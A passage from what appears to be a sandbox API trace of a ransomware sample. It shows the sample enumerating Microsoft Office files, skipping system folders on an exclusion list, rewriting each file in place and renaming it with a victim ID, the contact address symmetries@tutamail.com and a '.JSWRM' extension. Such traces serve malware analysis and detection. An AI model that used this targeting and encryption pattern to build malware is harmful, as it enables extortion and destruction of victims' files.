dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0112.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0112.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0112.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0112.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0112.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proof.culture.msi.16_proof.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\Proof.Culture.msi.16_proof.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proof.culture.msi.16_proof.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.761] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x98fae45, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x98fae45, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f04, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="proofing.msi.16_proofing.mcxml", cAlternateFileName="PROOFI~1.MCX")) returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2=".") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="..") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="...") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="windows") returned -1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="recovery") returned -1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="perflogs") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="documents and settings") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="system volume information") returned -1 [0112.761] lstrcmpiW (lpString1="proofing.msi.16_proofing.mcxml", lpString2="msocache") returned 1 [0112.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="proofing.msi.16_proofing.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0112.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="proofing.msi.16_proofing.mcxml", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="proofing.msi.16_proofing.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="proofing.msi.16_proofing.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0112.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="proofing.msi.16_proofing.mcxml", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="proofing.msi.16_proofing.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.762] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16132) returned 1 [0112.762] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f00) returned 0x24c1d0 [0112.763] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3f00, lpOverlapped=0x0) returned 1 [0112.766] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.766] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3f00, lpOverlapped=0x0) returned 1 [0112.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.766] CloseHandle (hObject=0x238) returned 1 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0112.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0112.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0112.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0112.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0112.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0112.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0112.767] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x996d62b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x996d62b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99b9a24, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ad0c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="publishermui.msi.16_publishermui.mcxml", cAlternateFileName="PUBLIS~1.MCX")) returned 1 [0112.767] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2=".") returned 1 [0112.767] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="..") returned 1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="...") returned 1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="windows") returned -1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="recovery") returned -1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="perflogs") returned 1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="documents and settings") returned 1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="system volume information") returned -1 [0112.768] lstrcmpiW (lpString1="publishermui.msi.16_publishermui.mcxml", lpString2="msocache") returned 1 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="publishermui.msi.16_publishermui.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="publishermui.msi.16_publishermui.mcxml", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="publishermui.msi.16_publishermui.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="publishermui.msi.16_publishermui.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="publishermui.msi.16_publishermui.mcxml", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="publishermui.msi.16_publishermui.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0112.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0112.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.769] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=240908) returned 1 [0112.769] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.769] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.805] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.805] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.806] CloseHandle (hObject=0x238) returned 1 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0112.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0112.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0112.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0112.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0112.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.806] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.808] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x444fb18, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x444fb18, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x44e8517, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2061bc, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="visiomui.msi.16_visiomui.mcxml", cAlternateFileName="VISIOM~1.MCX")) returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2=".") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="..") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="...") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="windows") returned -1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="recovery") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="perflogs") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="documents and settings") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="system volume information") returned 1 [0112.808] lstrcmpiW (lpString1="visiomui.msi.16_visiomui.mcxml", lpString2="msocache") returned 1 [0112.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="visiomui.msi.16_visiomui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0112.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="visiomui.msi.16_visiomui.mcxml", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="visiomui.msi.16_visiomui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0112.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="visiomui.msi.16_visiomui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0112.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="visiomui.msi.16_visiomui.mcxml", cchWideChar=30, lpMultiByteStr=0x2413d0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="visiomui.msi.16_visiomui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0112.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0112.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0112.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.846] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2122172) returned 1 [0112.846] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.846] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.857] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.858] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.858] CloseHandle (hObject=0x238) returned 1 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0112.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 